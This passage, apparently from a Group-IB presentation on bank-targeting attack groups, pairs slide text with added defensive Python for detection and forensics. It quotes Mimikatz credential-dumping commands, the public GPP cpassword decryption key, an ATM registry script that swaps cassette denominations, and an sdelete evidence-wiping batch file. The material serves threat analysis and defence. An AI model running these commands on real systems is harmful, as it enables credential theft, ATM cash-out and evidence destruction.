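CONSTRUCTED_SPF_RECORDS: Dict[str, str] = {
    "examplebank.com": "v=spf1 ip4:192.0.2.0/24 ip6:2001:db8::/32 -all",
    "examplebank-partner.com": "v=spf1 ip4:198.51.100.7 ~all",
}

QUALIFIERS = {"+": "pass", "-": "fail", "~": "softfail", "?": "neutral"}


def spf_result(record: str, client_ip: str) -> str:
    """Evaluate ip4/ip6/all mechanisms of a v=spf1 record for client_ip.
    Simplification (assumption): include/a/mx/exists are skipped, so a
    record that relies on them returns 'none' for an unmatched IP."""
    ip = ipaddress.ip_address(client_ip)
    terms = record.split()
    if not terms or terms[0].lower() != "v=spf1":
        return "none"
    for term in terms[1:]:
        qualifier = "+"
        if term[0] in QUALIFIERS:
            qualifier, term = term[0], term[1:]
        name, _, arg = term.partition(":")
        name = name.lower()
        if name == "all":
            return QUALIFIERS[qualifier]
        if name in ("ip4", "ip6"):
            try:
                net = ipaddress.ip_network(arg, strict=False)
            except ValueError:
                continue
            if ip.version == net.version and ip in net:
                return QUALIFIERS[qualifier]
    return "none"


def check_sender(domain: str, client_ip: str,
                 records: Dict[str, str] = CONSTRUCTED_SPF_RECORDS) -> str:
    """SPF verdict for a MAIL FROM domain seen from client_ip ('none' if the
    domain publishes no record)."""
    record = records.get(domain.lower())
    return spf_result(record, client_ip) if record else "none"


def edit_distance(a: str, b: str) -> int:
    """Levenshtein distance; small values mean one or two typo-squat edits."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def lookalike_of(domain: str, protected: List[str],
                 max_distance: int = 2) -> Optional[str]:
    """Return the protected domain that `domain` imitates, or None.
    `domain` is expected to be a registrable domain (not a subdomain).
    Flags near-identical names and the same first label under another TLD,
    the trick the slide attributes to new TLDs; an exact match is the brand
    itself and is not flagged."""
    d = domain.lower()
    for brand in protected:
        b = brand.lower()
        if d == b:
            return None
        if edit_distance(d, b) <= max_distance:
            return brand
        if d.split(".")[0] == b.split(".")[0]:
            return brand
    return None
```

A sender that fails SPF (slide 19) is rejected or quarantined by the first check; a sender from a freshly registered `examplebank.bank` or `examp1ebank.com` passes SPF and is caught only by the second, so both checks need to run, and the lookalike list needs the organisation's own brands plus those of its partners.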
22. GROUP-IB.COM
Tools to create malicious documents
• Microsoft Word Intruder (MWI)
• OffensiveWare Multi Exploit Builder (OMEB)
25. GROUP-IB.COM
Legal Software vs. Private Tools
New trend: Hackers Use Legal Software for Their Attacks
Legal attack frameworks have become very effective. Special trojans are not necessary anymore.
PRIVATE TOOLS
+
• Unknown before first public research
• Adjusted to the needs of the group
• Easy to use
• Inexperienced attackers can be involved
–
• Investments in development are needed
• High cost of ownership
• Becomes known quickly
• Dependency on developers
• Attracts attention
• Easier to attribute incidents and threat actors
• Simplifies the process of investigation
LEGAL SOFTWARE
+
• Hard to track such attacks
• Difficult to link different incidents
• Fewer traces to investigate
• Difficult to detect in a local network
–
• Higher qualification required
• Many solutions are DIY
• Difficult to attack several targets simultaneously
28. GROUP-IB.COM
Gaining privileges
DOMAIN CONTROLLER CONFIGURATION ERROR
• Using Group Policy Preferences (GPP)
• \\[server_name]\sysvol\[domain_name]\Policies\[group_policy_name]\Machine\Preferences\Groups\Groups.xml
• The perpetrators extract domain administrator credentials from the cpassword and userName fields in the Groups.xml file (the password is encrypted using the AES-256 algorithm and further coded using Base64 encoding).
• To obtain an unencrypted password the attackers decode it using Base64.
• This password is then decrypted using the key 4e9906e8fcb66cc9faf49310620ffee8f496e806cc057990209b09a433b66c1b.
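Because every domain user can read SYSVOL, any `cpassword` attribute left in a preference file is a credential the whole domain can recover, so the defender's check is simply to find them. The audit below is an added example, not Group-IB's code: `SAMPLE_GROUPS_XML` is a constructed file whose `cpassword` value is a placeholder string rather than a real blob, the `{CLSID-PLACEHOLDER}` attributes stand in for the real clsid values, and `GPP_FILES` lists the preference files that can carry the attribute (Groups.xml is the one on the slide; the others are an assumption from the same GPP feature).

```python
"""Audit Group Policy Preferences XML files for stored credentials (cpassword).
Added example with a constructed Groups.xml; not Group-IB's code."""
import os
import xml.etree.ElementTree as ET
from typing import Dict, List

# Preference files that may carry a cpassword attribute (assumption beyond the slide,
# which names Groups.xml only).
GPP_FILES = {"Groups.xml", "Services.xml", "ScheduledTasks.xml",
             "DataSources.xml", "Drives.xml", "Printers.xml"}

# Constructed sample: one local-user item that stores a password, one that does not.
SAMPLE_GROUPS_XML = """<Groups clsid="{CLSID-PLACEHOLDER}">
  <User clsid="{CLSID-PLACEHOLDER}" name="svc_backup" image="2"
        changed="2016-01-01 10:00:00" uid="{00000000-0000-0000-0000-000000000001}">
    <Properties action="U" newName="" fullName="" description=""
        cpassword="PLACEHOLDER_NOT_A_REAL_BLOB" changeLogon="0" noChange="1"
        neverExpires="1" acctDisabled="0" userName="svc_backup"/>
  </User>
  <User clsid="{CLSID-PLACEHOLDER}" name="helpdesk" image="2"
        changed="2016-01-01 10:00:00" uid="{00000000-0000-0000-0000-000000000002}">
    <Properties action="U" newName="" fullName="" description="" changeLogon="0"
        noChange="1" neverExpires="1" acctDisabled="0" userName="helpdesk"/>
  </User>
</Groups>
"""


def find_stored_credentials(xml_text: str, source: str = "<string>") -> List[Dict[str, object]]:
    """Return one record per <Properties> element that carries a non-empty cpassword.
    The account named in the record must be treated as compromised regardless of
    whether the blob is decrypted: the decryption key is public."""
    root = ET.fromstring(xml_text)
    findings: List[Dict[str, object]] = []
    for props in root.iter("Properties"):
        cpw = props.get("cpassword")
        if not cpw:
            continue
        # Different preference types name the account differently (assumption).
        account = props.get("userName") or props.get("accountName") or props.get("runAs") or ""
        findings.append({
            "file": source,
            "account": account,
            "action": props.get("action", ""),
            "cpassword_length": len(cpw),
        })
    return findings


def scan_policies_tree(policies_root: str) -> List[Dict[str, object]]:
    """Walk a SYSVOL Policies tree (or a local copy of it) and audit every GPP file."""
    findings: List[Dict[str, object]] = []
    for dirpath, _, filenames in os.walk(policies_root):
        for name in filenames:
            if name not in GPP_FILES:
                continue
            full = os.path.join(dirpath, name)
            with open(full, encoding="utf-8-sig") as fh:
                try:
                    findings.extend(find_stored_credentials(fh.read(), full))
                except ET.ParseError:
                    findings.append({"file": full, "error": "unparseable"})
    return findings
```

Remediation is to delete the preference items that carry a `cpassword`, rotate the accounts they named, and keep the scan in a periodic job; since Microsoft's MS14-025 update the management consoles refuse to create new items of this kind, but it does not remove existing ones from SYSVOL.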
29. GROUP-IB.COM
Gaining privileges
MIMIKATZ
If the attackers have access to a domain controller:
mimikatz sekurlsa::logonpasswords
If the attackers have local root privileges without access to a domain controller:
The attackers connect to workstations and servers in order to find a user with access to the domain controller. A pass-the-hash attack can be performed.
30. GROUP-IB.COM
Gaining privileges
MIMIKATZ
If the attackers do not have local administrator rights:
Exploiting the operating system vulnerabilities CVE-2014-4113, CVE-2015-1701, CVE-2015-2363 and CVE-2015-2426 enables the criminals to gain SYSTEM-level privileges on x32 and x64 operating systems. The malware connects to hosts and checks them for the necessary vulnerabilities.
MIMIKATZ GOLDEN TICKET
• "privilege::debug" "lsadump::samrpc /patch" exit
• extract the NTLM hash of the krbtgt account (Key Distribution Center Service Account)
• create a file with a golden TGT ticket
31. GROUP-IB.COM
Tools to research the network
netscan.exe – a network scanner NetScan
patch86.exe – a Termsrv patch to support simultaneous terminal sessions (KEY indicator)
plink.exe – an ssh console client for Windows
psexec.exe – a remote console for Windows
32. GROUP-IB.COM
Tools to research the network
REMOTE ADMINISTRATION TOOLS:
• AmmyAdmin
• TeamViewer or TVRat
• Hamachi LogMeIn
• RMS
• LightManager
• HidenVNC
• Hidden channel over SMB, DNS, HTTPS
35. GROUP-IB.COM
Change denomination of withdrawal banknotes
• Remote access to the ATM from the internal network
• Launched a .bat script that changed registry keys
• A money mule came to the ATM and withdrew cash from his bank account
• During the withdrawal he selected small denominations
• Instead of small denominations the ATM spat out big denominations from the wrong cassette
Registry key name   Value
VALUE_1             5000
VALUE_2             1000
VALUE_3             500
VALUE_4             100
.bat file from the ATM:
REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Wincor Nixdorf\ProTopas\CurrentVersion\LYNXPAR\CASH_DISPENSER" /v VALUE_1 /t REG_SZ /d "5000" /f
REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Wincor Nixdorf\ProTopas\CurrentVersion\LYNXPAR\CASH_DISPENSER" /v VALUE_2 /t REG_SZ /d "1000" /f
REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Wincor Nixdorf\ProTopas\CurrentVersion\LYNXPAR\CASH_DISPENSER" /v VALUE_3 /t REG_SZ /d "500" /f
REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Wincor Nixdorf\ProTopas\CurrentVersion\LYNXPAR\CASH_DISPENSER" /v VALUE_4 /t REG_SZ /d "100" /f
REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Wincor Nixdorf\ProTopas\CurrentVersion\LYNXPAR\CASH_DISPENSER" /v VALUE_1 /t REG_SZ /d "100" /f
REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Wincor Nixdorf\ProTopas\CurrentVersion\LYNXPAR\CASH_DISPENSER" /v VALUE_4 /t REG_SZ /d "5000" /f
shutdown -r -t 0 -f
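The script's net effect is easy to miss when reading it line by line: the first four REG ADD lines restate the bank's layout and only the last two swap cassettes 1 and 4 before forcing a reboot. The following is an added example, not Group-IB's code, that replays such a script offline and diffs the resulting CASH_DISPENSER values against the configured layout; `CONSTRUCTED_BAT` reproduces the slide's sequence and `EXPECTED_CASSETTES` is a constructed baseline, the kind of value an ATM integrity monitor would hold for each machine.

```python
"""Replay REG ADD lines from a cassette-denomination .bat and diff the final
CASH_DISPENSER values against the configured layout. Added example with a
constructed script; not Group-IB's code."""
import re
from typing import Dict, List, Tuple

CASH_DISPENSER_KEY = (
    r"HKEY_LOCAL_MACHINE\SOFTWARE\Wincor Nixdorf\ProTopas\CurrentVersion"
    r"\LYNXPAR\CASH_DISPENSER"
)

# Constructed .bat reproducing the sequence shown on the slide.
CONSTRUCTED_BAT = "\n".join(
    [f'REG ADD "{CASH_DISPENSER_KEY}" /v VALUE_{n} /t REG_SZ /d "{v}" /f'
     for n, v in [(1, 5000), (2, 1000), (3, 500), (4, 100), (1, 100), (4, 5000)]]
    + ["shutdown -r -t 0 -f"]
)

# Cassette layout the bank configured (constructed baseline).
EXPECTED_CASSETTES = {"VALUE_1": "5000", "VALUE_2": "1000",
                      "VALUE_3": "500", "VALUE_4": "100"}

REG_ADD = re.compile(
    r'^\s*REG\s+ADD\s+"(?P<key>[^"]+)"\s+/v\s+(?P<name>\S+)\s+/t\s+\S+\s+/d\s+"(?P<data>[^"]*)"',
    re.IGNORECASE,
)


def parse_reg_adds(bat_text: str) -> List[Tuple[str, str, str]]:
    """Return (key, value name, data) for every REG ADD line, in script order."""
    writes = []
    for line in bat_text.splitlines():
        m = REG_ADD.match(line)
        if m:
            writes.append((m.group("key"), m.group("name"), m.group("data")))
    return writes


def final_registry_state(bat_text: str, key: str = CASH_DISPENSER_KEY) -> Dict[str, str]:
    """Replay the writes under `key`; later writes win, which is how the slide's
    script ends with cassettes 1 and 4 swapped although it set them correctly first."""
    state: Dict[str, str] = {}
    for k, name, data in parse_reg_adds(bat_text):
        if k.lower() == key.lower():
            state[name.upper()] = data
    return state


def cassette_drift(expected: Dict[str, str],
                   observed: Dict[str, str]) -> Dict[str, Tuple[str, str]]:
    """Map each cassette whose value changed to (expected, observed)."""
    return {name: (expected[name], observed.get(name, ""))
            for name in expected if observed.get(name) != expected[name]}


def forces_reboot(bat_text: str) -> bool:
    """A reboot is needed for the dispenser to reload the values, so its presence
    alongside CASH_DISPENSER writes is part of the pattern."""
    return any(line.strip().lower().startswith("shutdown")
               for line in bat_text.splitlines())
```

The same `cassette_drift` comparison applied to a live export of the key, rather than to a script, is the monitoring control: alert whenever the configured denominations change outside a change window, and treat an unscheduled reboot of an ATM that follows such a change as the trigger for a cassette audit.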
36. GROUP-IB.COM
Modified diagnostic tools
• Attackers disabled the KDIAG function responsible for checking whether the door is open.
• They uploaded a modified version of KDIAG to the ATM and sent the command to withdraw cash.
• At the same time, a money mule came to the ATM with an open bag to grab the money.
37. GROUP-IB.COM
Software for attacks on ATMs
A malicious program that uses standard functions of the XFS interface via the XFS Manager (eXtensions for Financial Services). Its parameters:
ServiceLogicalName — a service name used as an argument for the WFSOpen function (for example, "Cash Dispenser Module").
Cassettes Count — the total number of cassettes on the device. The value should be set in the interval from 1 to 15.
Cassette Number — the number of the cassette which should dispense cash. The value should be set in the interval from 1 to 15.
Banknotes Count — the number of banknotes to be dispensed from the cassette. The value should be set in the interval from 1 to 60.
Dispenses Count — the number of times the cash dispense should be repeated. The value should be set in the interval from 1 to 60.
38. GROUP-IB.COM
Outward Telegraphic Transfer Comm & Charges
MD5 6D355FFA06AE39FC8671CC8AC38F984E
Searches for files in the directory:
D:\WIN32APP\SWIFTALLIANCE\SERVER\Batch\Outgoing\HK\HKAcksBak
Here «Outgoing» denotes outgoing transactions and «HK» denotes Hong Kong, so the program is looking for transactions to Hong Kong banks.
If a file is larger than 102400 bytes, it appends «Too big file <file name> : <file size> > 102400\r\n» to C:\Temp\Msglog.txt and does not scan it. Otherwise it opens the file and searches it for the substrings «OTTC605384», «OTTC605385», «OTTC601386», «OTTC601387», «OTTC605381», «OTTC605382».
If a file contains one of these substrings, it writes «Found file: %s with required token: <found substring>\r\n» to C:\Temp\Msglog.txt and copies the file into the directory C:\Temp\Msg.
It then sleeps for 2.5 seconds and repeats the search.
Hong Kong-based FI: OTTC605384, OTTC605385, OTTC601386, OTTC601387, OTTC605381, OTTC605382
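An added example for the responder, not code from the presentation or from the sample: the log the sample keeps in C:\Temp\Msglog.txt is, in effect, a list of which SWIFT batch files it collected and which it skipped. This parser reconstructs that list from the two line formats quoted above. The sample log and the paths in it are constructed for the example.

```python
"""Added example: parse the C:\\Temp\\Msglog.txt log described above and recover which
SWIFT batch files the sample matched, which token triggered each copy, and which files
it skipped as too big."""
import re
from collections import defaultdict

# The six tokens hard-coded in the sample, per the slide.
TOKENS = {"OTTC605384", "OTTC605385", "OTTC601386", "OTTC601387", "OTTC605381", "OTTC605382"}

# Line formats quoted on the slide; the sample terminates lines with \r\n.
FOUND_RE = re.compile(r"^Found file: (?P<path>.+?) with required token: (?P<token>\S+)\s*$")
TOOBIG_RE = re.compile(r"^Too big file (?P<path>.+?) : (?P<size>\d+) > 102400\s*$")


def parse_msglog(text):
    """Return (matched, skipped, unparsed).

    matched:  {path: sorted list of tokens}  files copied to C:\\Temp\\Msg
    skipped:  {path: size}                   files over 102400 bytes, never scanned
    unparsed: lines in neither format        worth a manual look
    """
    matched, skipped, unparsed = defaultdict(set), {}, []
    for line in text.splitlines():          # splitlines() handles the \r\n endings
        if not line.strip():
            continue
        m = FOUND_RE.match(line)
        if m:
            matched[m["path"]].add(m["token"])
            continue
        m = TOOBIG_RE.match(line)
        if m:
            skipped[m["path"]] = int(m["size"])
            continue
        unparsed.append(line)
    return {p: sorted(t) for p, t in matched.items()}, skipped, unparsed


def unknown_tokens(matched):
    """Tokens in the log that are not among the six hard-coded ones: a sign of a
    different build of the sample or of a tampered log."""
    return sorted({t for ts in matched.values() for t in ts} - TOKENS)


# Constructed sample log, not a real artifact. The search loop runs every 2.5 s, so the
# same file is typically logged more than once.
SAMPLE_LOG = (
    "Found file: D:\\Batch\\Outgoing\\HK\\out_0001.fin with required token: OTTC605384\r\n"
    "Too big file D:\\Batch\\Outgoing\\HK\\out_0002.fin : 204800 > 102400\r\n"
    "Found file: D:\\Batch\\Outgoing\\HK\\out_0001.fin with required token: OTTC605384\r\n"
    "Found file: D:\\Batch\\Outgoing\\HK\\out_0003.fin with required token: OTTC601387\r\n"
    "garbage line from another tool\r\n"
)
```

The skipped list matters as much as the matched one: any batch over 102400 bytes was never read by the sample, which narrows the set of transactions that could have leaked.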
39. GROUP-IB.COM
ARM CBR (the Bank of Russia's payment client, a SWIFT analogue)
MONEYTAKER V5.0
Four modules:
Main – launches the other modules with the parameters specified in the main config file.
AutoReplacer (XmlBin) – replaces payment details in the files in the ARM CBR directory and writes the result of each replacement to the Xml-Resultfile. It does not change the SUM field, to avoid detection.
Hiding (EdBin) – checks incoming/confirmation messages: it compares the «PayeePersonalAcc» field with «HackAcc» from the Xml-Resultfile. If the values match, it puts the original PayeePersonalAcc back, so the operator sees the payee that was intended.
Temp (TxtBin) – purpose unknown.
Xml-Resultfile
#
#
Id=
OrigAcc=
OrigBic=
OrigCor=
Purpose=
HackAcc=
HackBic=
HackCor=
Sum=
PayerPersonalAcc=
#
#
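An added example, not code from the presentation or from MoneyTaker: because the Hiding module rewrites confirmations on the infected ARM CBR host, the substitution can only be caught by reconciling against data that never passed through that host (for example, the account statement obtained from the Bank of Russia side). The check below looks for exactly the MoneyTaker fingerprint, same Id and same Sum but a different payee, and also parses the Xml-Resultfile layout shown above, which is the attacker's own ledger of substitutions. The order and statement records, the PayeeBic field name and all account numbers are constructed for the example.

```python
"""Added example: detect a MoneyTaker-style payee substitution by reconciling payment
orders as entered on the bank side with independently obtained executed payments, and
parse the Xml-Resultfile the AutoReplacer module writes."""


def parse_resultfile(text):
    """Split the '#'-delimited key=value records of the Xml-Resultfile into dicts."""
    records, current = [], {}
    for raw in text.splitlines():
        line = raw.strip()
        if line == "#":
            if current:
                records.append(current)
                current = {}
        elif "=" in line:
            key, value = line.split("=", 1)
            current[key.strip()] = value.strip()
    if current:
        records.append(current)
    return records


def reconcile(orders, executed):
    """Compare orders (Id, Sum, PayeePersonalAcc, PayeeBic as the operator entered them)
    with executed payments from a source the infected host cannot rewrite.

    A MoneyTaker replacement keeps Sum unchanged and swaps the payee, so the telling case
    is: same Id, same Sum, different PayeePersonalAcc/PayeeBic.
    """
    by_id = {o["Id"]: o for o in orders}
    findings = []
    for e in executed:
        o = by_id.get(e["Id"])
        if o is None:
            findings.append(("unknown_payment", e["Id"], e))
        elif o["Sum"] != e["Sum"]:
            findings.append(("amount_mismatch", e["Id"], e))
        elif (o["PayeePersonalAcc"], o["PayeeBic"]) != (e["PayeePersonalAcc"], e["PayeeBic"]):
            findings.append(("payee_substituted", e["Id"], e))
    return findings


def substituted_ids(findings):
    return sorted(i for kind, i, _ in findings if kind == "payee_substituted")


def cross_check(records, findings):
    """For each payee_substituted finding, confirm the executed payee equals the HackAcc/HackBic
    the attacker's Xml-Resultfile recorded for that Id (True = the ledger explains it)."""
    hack = {r["Id"]: (r["HackAcc"], r["HackBic"]) for r in records}
    return {i: hack.get(i) == (e["PayeePersonalAcc"], e["PayeeBic"])
            for kind, i, e in findings if kind == "payee_substituted"}


# Constructed data (fictitious accounts and BICs). Order 1002's payee was swapped; Sum kept.
ORDERS = [
    {"Id": "1001", "Sum": "150000.00", "PayeePersonalAcc": "40702810000000000101", "PayeeBic": "040000001"},
    {"Id": "1002", "Sum": "980000.00", "PayeePersonalAcc": "40702810000000000202", "PayeeBic": "040000001"},
    {"Id": "1003", "Sum": "42000.00",  "PayeePersonalAcc": "40702810000000000303", "PayeeBic": "040000003"},
]
EXECUTED = [
    {"Id": "1001", "Sum": "150000.00", "PayeePersonalAcc": "40702810000000000101", "PayeeBic": "040000001"},
    {"Id": "1002", "Sum": "980000.00", "PayeePersonalAcc": "40817810099999999999", "PayeeBic": "040000002"},
    {"Id": "1003", "Sum": "42000.00",  "PayeePersonalAcc": "40702810000000000303", "PayeeBic": "040000003"},
]
# Constructed Xml-Resultfile content in the layout shown on the slide.
SAMPLE_RESULTFILE = """#
#
Id=1002
OrigAcc=40702810000000000202
OrigBic=040000001
OrigCor=30101810000000000001
Purpose=Payment for services
HackAcc=40817810099999999999
HackBic=040000002
HackCor=30101810000000000002
Sum=980000.00
PayerPersonalAcc=40702810000000000999
#
#
"""
```

The reconciliation has to be fed from outside the ARM CBR host; if the "executed" side is taken from confirmations displayed on that host, the Hiding module has already restored the original payee and the check will pass.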
40. GROUP-IB.COM
Software to clean up evidence
DEL.BAT
sdelete.exe -accepteula -p 32 d2.exe
sdelete.exe -accepteula -p 32 xtl.exe
sdelete.exe -accepteula -p 32 *.txt
sdelete.exe -accepteula -p 32 d2s.exe
del sdelete.exe
del del.bat
The del.bat script runs SDelete (a Sysinternals utility), which overwrites a file's contents before deleting it (here with 32 passes, -p 32) so that the contents cannot be recovered by forensic examination of the disk; the script then deletes SDelete and itself. The wipe is not invisible, however: SDelete renames each file 26 times before removing it, and those renames and the deletions can still be found in NTFS metadata such as the change journal.
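The forensic caveat above, as an added example that is not from the presentation: SDelete's documented behaviour is to rename the file 26 times, replacing every character of the name with A, then B, and so on to Z (foo.txt becomes AAA.AAA first), and only then delete it. That chain survives in the NTFS change journal ($UsnJrnl) even though the contents do not. The detector below walks a parsed journal export and reports files wiped that way, recovering the original name from the first rename. The record tuple shape and the sample journal are constructed for the example.

```python
"""Added example: find files wiped by SDelete from a parsed NTFS change-journal export,
using the A..Z rename chain SDelete performs before deletion."""
import re

# A name made of a single repeated letter (dots kept), e.g. "AA.AAA" or "BBBBBBB.BBB".
SDELETE_NAME = re.compile(r"^([A-Z])(?:\1|\.)*$")


def sdelete_rename_chain(original):
    """The 26 names SDelete gives a file on its way to deletion (dots are preserved)."""
    return ["".join("." if c == "." else letter for c in original)
            for letter in "ABCDEFGHIJKLMNOPQRSTUVWXYZ"]


def find_sdelete_wipes(records, min_chain=3):
    """records: iterable of (file_ref, reason, name) in journal order, where reason is the
    USN reason string (e.g. "RENAME_OLD_NAME", "RENAME_NEW_NAME", "FILE_DELETE|CLOSE").
    Returns one dict per file whose deletion was preceded by an A, B, C... rename chain
    of at least min_chain steps."""
    state, wipes = {}, []
    for file_ref, reason, name in records:
        st = state.setdefault(file_ref, {"orig": None, "chain": 0, "expect": "A"})
        if "RENAME_OLD_NAME" in reason:
            if st["chain"] == 0:
                st["orig"] = name            # name before the first rename of a chain
        elif "RENAME_NEW_NAME" in reason:
            m = SDELETE_NAME.match(name)
            if m and m.group(1) == st["expect"]:
                st["chain"] += 1
                st["expect"] = chr(ord(st["expect"]) + 1)
            else:                            # an ordinary rename: start over
                st.update(orig=None, chain=0, expect="A")
        elif "FILE_DELETE" in reason:
            if st["chain"] >= min_chain:
                wipes.append({"file_ref": file_ref, "original_name": st["orig"],
                              "renames": st["chain"]})
            state.pop(file_ref, None)
    return wipes


def journal_for_sdelete(file_ref, original):
    """Constructed journal records for one file wiped by SDelete (not a real export)."""
    names = [original] + sdelete_rename_chain(original)
    recs = []
    for old, new in zip(names, names[1:]):
        recs += [(file_ref, "RENAME_OLD_NAME", old), (file_ref, "RENAME_NEW_NAME", new)]
    return recs + [(file_ref, "FILE_DELETE|CLOSE", names[-1])]


# Constructed sample: d2.exe and xtl.exe wiped as in DEL.BAT above, plus an ordinary
# rename-and-delete that must not be flagged.
SAMPLE_JOURNAL = (
    journal_for_sdelete(100, "d2.exe")
    + [(200, "RENAME_OLD_NAME", "report.docx"),
       (200, "RENAME_NEW_NAME", "report_final.docx"),
       (200, "FILE_DELETE|CLOSE", "report_final.docx")]
    + journal_for_sdelete(101, "xtl.exe")
)
```

Matching on the same file reference number is what makes this robust: the 26 renames keep the MFT record, so the chain and the final delete line up even when records of several files are interleaved in the journal.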
MBR KILLER
The program wipes the Master Boot Record (MBR), so the machine no longer boots from that disk.
41. GROUP-IB.COM
Future
More criminal groups
Targeted attacks are a new opportunity for criminals who already understand banks and money laundering.
More attacks
A global landscape and ready-to-use tools, techniques and tactics let attackers be more effective.
Legitimate software
We will see many more attacks that use legitimate software without custom trojans.
Harder to attribute and investigate
Legitimate software in attacks will force us to change attribution and investigation procedures.